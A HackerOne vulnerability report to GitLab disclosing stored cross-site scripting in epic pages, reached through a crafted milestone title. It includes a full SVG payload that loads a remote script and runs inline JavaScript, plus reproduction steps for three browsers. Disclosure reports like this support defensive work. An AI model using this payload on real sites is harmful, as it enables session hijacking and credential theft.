Stored XSS in epic's pages
HackerOne report #1055814 by mike12
on 2020-12-10, assigned to @rchan-gitlab:
Report | Attachments | How To Reproduce
Report
Hi Gitlab!
It's possible to inject arbitrary JS code into an epic's page using the Start date and Due date.
This XSS works for:
- gitlab.com using Firefox (tested in Firefox 83.0)
- A self-hosted GitLab instance without CSP using Safari (tested in Safari 13.1), Chrome (tested in Chrome 87.0.4280.88) or Firefox
Steps to reproduce using Firefox
-
Open your browser and navigate to https://gitlab.com
-
Create a group and a project in it
-
Add a file named
demo.svg
to the project with the following content:<svg id="x" xmlns="http://www.w3.org/2000/svg" width="100" height="100" > <foreignObject> <iframe xmlns="http://www.w3.org/1999/xhtml" srcdoc='&lt;script src=https://gitlab.com/mike12-h1/csp/-/raw/master/index.js&gt; &lt;/script&gt;'></iframe> </foreignObject> <image href="foo" onerror="alert('onerror')"/> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert('xlink:href')"> <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red"/> <text x="50%" y="50%" text-anchor="middle" stroke="#000000" stroke-width="1px" dy=".3em">Click me</text> </a> </svg>
-
Create a new epic in the group
-
Create a new issue in the project
-
Assign the created epic to the issue
-
Create a new milestone in the project
- Title:
&lt;svg width=&quot;100&quot;&gt;&lt;use xlink:href=&quot;/<YOUR-GROUP-NAME>/<YOUR-PROJECT>/-/raw/master/demo.svg#x&quot; /&gt;&lt;/svg&gt;
(Replace<YOUR-GROUP-NAME>
and<YOUR-PROJECT>
with your values) - Specify any valid Start Date and Due Date values
- Title:
-
Assign the created milestone to the issue
-
Navigate to the epic created in step 4
-
Hover your mouse over the inherited due date
Steps to reproduce using Safari
- Run a self-hosted Gitlab instance
- Repeat steps 2 through 10 from the "Steps to reproduce using Firefox" section.
Steps to reproduce using Chrome
- Run a self-hosted Gitlab instance
- Repeat steps 2 through 10 from the "Steps to reproduce using Firefox" section.
- Click the red circle in the due date tooltip.
Impact
An attacker can:
- Perform any action within the application that a user can perform
- Steal sensitive user data, including credentials
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: